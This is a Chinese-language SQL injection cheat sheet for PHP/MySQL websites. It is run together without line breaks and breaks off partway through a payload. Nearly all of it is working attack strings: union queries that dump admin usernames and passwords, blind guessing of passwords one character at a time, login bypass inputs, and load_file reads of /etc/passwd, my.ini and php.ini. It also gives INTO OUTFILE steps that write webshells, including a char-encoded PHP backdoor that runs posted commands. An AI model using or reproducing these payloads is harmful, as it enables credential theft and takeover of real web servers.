注入语句大全

注释有3种：/* #(%23) -空格判断有无:数字型and 1=1and 1=2字符型 and 1=1 %23 and 1=2 %23搜索型a% and 1=1 %23a% and 1=2 %23数字型注入：判断当前表字段数order by 17或and 1=1 union select 1+爆联合查询后被覆盖字段的位置and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11爆出数据库系统信息user(),database(),version(),system_user(),current_user()查看用户判断权限and (select count(*) from mysql.user)0/*判断是否有admin表and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11 from admin爆用户名密码and 1=2 union select 1,2,user,pass,5,6,7,8,9,10,11 from admin读取文件内容and 1=2 union select 1,2,load_file(c:/apache/htdocs/site/lib/sql.inc),4,5,6,7,8,9,10,11读取字段内容并保存到另一文件and 1=2 union select 1,2,user,4,5,6,7,8,9,10,11 from admin into outfile C:/apache/htdocs/site/beach.php执行写入的脚本文件http:/www.x.cc/beach.php?变量=参数注入方式：是否存在adminand 1=(select min(id) from admin)username长度是否为5and 1=(select min(id) from admin where length(username)=5)判断password是否为32and 1=(select min(id) from admin where length(username)=5 and length(password)=32)猜解用户名第一位是否为a.mid(字段名,第几位,第几项)and 1=(select min(id) from admin where ascii(mid(username,1,1)=97)当前表下的猜解：http:/localhost/user.php?id=1 and length(password)=7第一位密码http:/localhost/user.php?id=1 and ascii(mid(password,1,1)=97第二位密码http:/localhost/user.php?id=1 and ascii(mid(password,2,1)=97绕过登录验证：1.ALL(ora=a)2.ALL(or 1=1 and =)3.user(or 1=1 #)4.user(or id1 #)字符型注入：登录http:/localhost/site/admin/login.php?username=char(98,101,97,99,104)%23或http:/localhost/site/admin/login.php?username=0x%23或http:/localhost/admin/login.php?username=char(98,101,97,99,104) or 1=1 %23爆字段http:/localhost/display.php?type=char(120,105,97,111,104,117,97) and 1=2 union select 1,2,username,4,password,6,7,8,9,10,11from admin读取boot.inihttp:/localhost/index.php?url=&dlid=1 and 1=2 union select 1,2,load_file(char(99,58,47,98,111,111,116,46,105,110,105),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18直接写Shell1magic_quotes_gpcOff木马改成jpg后缀.上传后路径为/upload/.jpghttp:/localhost/site/display.php?id=451 and 1=2 union select 1,2,load_file(C:/apache/htdocs/site/upload/.jpg),4,5,6,7,8,9,10,11 into outfileC:/apache/htdocs/site/shell.php2On Off通用.读配置文件sql.inc.phhttp:/localhost/site/display.php?id=451 and 1=2 union select 1,2,load_file(0x433A2F52FF63732FF6C69622F73716C2E696E632E),4,5,6,7,8,9,10,11进PhpMyAdmin后插入木马并写入文件1.建立表beach 字段cmd：CREATE TABLE beach (cmd text NOT NULL) ENGINE=MyISAM DEFAULT CHARSET=latin1;2.插入木马内容INSERT INTO beach VALUES ();3.写入文件SELECT * FROM beach into outfile C:/apache/htdocs/site/cmd1.php;注册用户插入木马email的地方输入写入shellhttp:/localhost/site/display.php?id=451 and 1=2 union select 1,2,email,4,5,6,7,8,9,10,11 from user where id=10 intooutfileC:/apache/htdocs/site/test.php跨库查询：mysql/data/load_filemysql/data/库/table.myd 表数据http:/localhost/site/display.php?id=451 and 1=2 union select 1,2,load_file(beach2/user.myd),4,5,6,7,8,9,10,11读取某文件源码view-source:/beach.php?id=1 and 1=2 union select 1,2,load_file(char(ascii码),4,5,6,7,8,9,10,11一句话后门，WINDOWS下:load_file(char(99,58,47,119,105,110,100,111,119,115,47,112,104,112,46,105,110,105) c:/windows/php.ini /里面有什么不用我说了吧?load_file(char(99,58,47,119,105,110,110,116,47,112,104,112,46,105,110,105) c:/winnt/php.iniload_file(char(99,58,47,119,105,110,100,111,119,115,47,109,121,46,105,110,105) c:/windows/my.ini /管理员登陆过MYSQL会留下密码和用户名load_file(char(99,58,47,119,105,110,110,116,47,109,121,46,105,110,105) c:/winnt/my.iniload_file(char(99,58,47,98,111,111,116,46,105,110,105) c:/boot.iniLUNIX/UNIX下:load_file(char(47,101,116,99,47,112,97,115,115,119,111,114,100) /etc/password /不用我说了吧?load_file(char(47,117,115,114,47,108,111,99,97,108,47,104,116,116,112,100,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102) /usr/local/httpd/conf/httpd.conf /也许能找到网站默认目录哦!load_file(char(47,117,115,114,47,108,111,99,97,108,47,97,112,97,99,104,101,50,47,99,111,110,102,47,104,116,116,112,100,46,99,111,110,102) /usr/local/apache2/conf/httpd.conf /也许能找到网站默认目录哦!1:有时候,你明明确认自己拥有读和写文件的权利,却硬是读不出来文件,或者一片空白.为什么?原因可能是对方的系统在权限配置上做的好,你的USER权限,读不到他ADMINISTRATOR里的文件.NTFS和LINUX都能做到这点.如果你排除以上情况,你就要考虑,是不是你读出来的内容,被浏览器当作HTML,ASP,PHP,ASPX,JSP等等的脚本语言给执行了?譬如你读出来的内容如果含有等符号,那么浏览器就会执行你的文件内容,你自然什么都看不到.对付这样的情况,也很简单,我们只要把那些特殊的符号,在读出来的时候,用别的符号去代替他们,这样浏览器就不会去执行他们了!怎么代替?我们有replace(load_file(A),char(B),char(C)函数在!当你读A文件出来的时候,如果里面有B字母或者符号,那么MYSQL会用C字母或者符号去代替B,然后再显示出来.OK.我们这么一换上:replace(load_file(A),char(60),char(32).这里一样用的CHAR()函数转换为字母即一旦出现符号,就用空格来代替他.这样就能完整的回显内容给你了.2:所有的字段位置都不够位置回显,读到的文件不完整哦,又不是上面的原因,那么怎么办呢?这里我们用Substring(str,pos,len)函数解决问题.他的意思是从字符串str的pos位位置起返回len个字符的子串.譬如Substring(load_file(A),50,100)就是把A的内容的第50个字母开始回显100个给你.那么就能逐段逐段的回显啦.CODE:/coder.php?id=1 and 1=2 union select 1,load_file( /www/home/html/upload/qingyafengping.jpg),3,4,5,6 into outfile /www/home/html/coder.php/* 你的小马就诞生了.其中/www/home/html/upload/qingyafengping.jpg为你已上传的木马地址.3,4,5,6为假设存在字段,/www/home/html/为假设的WEB路径.用法2,也是重点要说的.上面的方法,局限性还是比较大的,如果网站不给你上传,或者网站过滤上传的内容,那怎么办?不用怕,剑心早在几年前就给我们想到了个好办法.我们只需要直接这么执行URL:CODE:/coder.php?id=1 and 1=2 union select 1,char(这里是你的马的代码,记得转为10进或者16进),3,4,5,6 into outfile /www/home/html/coder.php/* 这样你的小马也诞生了,不需要上传,也不怕他过滤.譬如CODE:/coder.php?id=1 and 1=2 union select 1,char(60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,99,109,100,93,41,63,62),3,4,5,6 into outfile /www/home/html/coder.php/*或者/coder.php?id=1 and 1=2 union select 1,0x3C3F6616C28245F504F53545B636D645D293F3E,3,4,5,6 into outfile /www/ho